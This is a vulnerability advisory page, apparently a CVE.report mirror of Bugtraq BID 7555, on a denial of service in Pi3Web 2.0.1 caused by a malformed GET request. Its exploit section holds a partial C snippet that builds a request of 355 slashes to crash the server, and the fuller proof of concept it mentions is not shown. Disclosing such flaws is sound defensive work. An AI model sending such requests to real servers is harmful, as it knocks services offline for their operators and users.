Pi3Web Malformed GET Request Denial Of Service Vulnerability

BID:7555

Info

Pi3Web Malformed GET Request Denial Of Service Vulnerability

Bugtraq ID: 7555
Class: Failure to Handle Exceptional Conditions
CVE:
Remote: Yes
Local: No
Published: May 12 2003 12:00AM
Updated: May 12 2003 12:00AM
Credit: Discovery of this vulnerability has been credited to at4r <[email protected]>.
Vulnerable: Pi3 Pi3Web 2.0.1
Not Vulnerable: Pi3 Pi3Web 2.0
Pi3 Pi3Web 1.0.3

Discussion

Pi3Web Malformed GET Request Denial Of Service Vulnerability

It has been reported that Pi3Web server is prone to a denial of service vulnerability. Reportedly, when a malicious GET request is sent to the Pi3Web server the server will fail. It should be noted that the Unix version has been reported vulnerable, it is not currently known if other platforms are affected.

Exploit / POC

Pi3Web Malformed GET Request Denial Of Service Vulnerability

The following snippet has been suggested by Holger Zimmermann to replace the equivalent lines in the exploit:

int main(int argc, char **argv)
{
int i, port, sd, rc;
char buffer[356];
char packet[380];
struct sockaddr_in server;

if(argc > 3 || argc < 2)
{
printf("USAGE: %s IP PORT\n", argv[0]);
printf("e.g. ./pi3web-DoS 127.0.0.1 80\n");
exit(0);
}
if(argc == 2) port = 80;
else port = atoi(argv[2]);

//Build the malformed request
for(i = 0; i < 355; i++) buffer[i] = '/';
buffer[i] = 0;
sprintf(packet, "GET %s HTTP/1.0\n\n", buffer);

The following proof of concept exploit has been supplied:

Solution / Fix

Pi3Web Malformed GET Request Denial Of Service Vulnerability

Solution:
Fixes available:


Pi3 Pi3Web 2.0.1

References

Pi3Web Malformed GET Request Denial Of Service Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report